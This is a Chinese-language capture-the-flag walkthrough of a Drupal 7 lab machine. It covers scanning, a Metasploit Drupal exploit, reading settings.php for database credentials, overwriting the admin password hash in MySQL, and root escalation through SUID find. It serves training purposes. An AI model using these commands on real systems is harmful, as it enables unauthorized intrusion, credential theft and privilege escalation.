目录
导入靶机
点击重试--》网卡改成 NAT模式--》开启靶机
信息收集
发现IP
arp-scan -l
发现靶机 IP 是 192.168.109.163
目录扫描
python3 dirsearch.py -u 192.168.109.163 -i 200
端口扫描
nmap -p- -A 192.168.109.163
发现开放了 22、80、111、45723 端口
访问 web
通过插件发现 CMS 是 Drupal 7
查看 robots.txt 文件无发现
查看Drupal 7 是否存在漏洞
发现存在 CMS 漏洞
漏洞利用
进入 msf 控制台
msfconsole
搜索对应模块
search drupal
使用模块
设置模块使用的对象,并且运行脚本,如图所示,成功连接
set rhosts 192.168.109.163
run
获得shell
获得shell 然后获得交互式 shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看当前目录发现在 www 下,进而发现了第 1 个 flag
Every good CMS needs a config file - and so do you.
去查看它的配置文件
在 sites/default/settings.php 文件中发现了第 2 个 flag,并得到了数据库的账户和密码
cd sites/default
cat settings.php
连接数据库
mysql -udbuser -p
R0ck3t
show databases;
use drupaldb;
show tables;
select * from users;
发现管理员用户,但是密码是加密的
修改管理员用户的密码
找到系统默认的加密scripts脚本,drupal默认hash加密脚本是在drupal7项目所在目录,所以是在网站的根目录下
find / -name scripts
php scripts/password-hash.sh 666
update drupaldb.users set pass="$S$DvsHxMU1J7auXAwRy2BO7YhiY/soyOoybzycnhI5fuNWYcccQuul" where name="admin";
修改成功
登录
翻找之后在 content 发现了第 3 个 flag
cat /etc/passwd
发现第 4 个 flag 在/home 里,然后找到了第 4 个 flag
cd /home/flag4
cat flag4.txt
提权
SUID-find提权
find / -perm -u=s -type f 2>/dev/null
有find文件,再次确认find文件的文件拥有者(属主)
ls -l /usr/bin/find
find命令直接提权
find / -exec '/bin/sh' \;
提权成功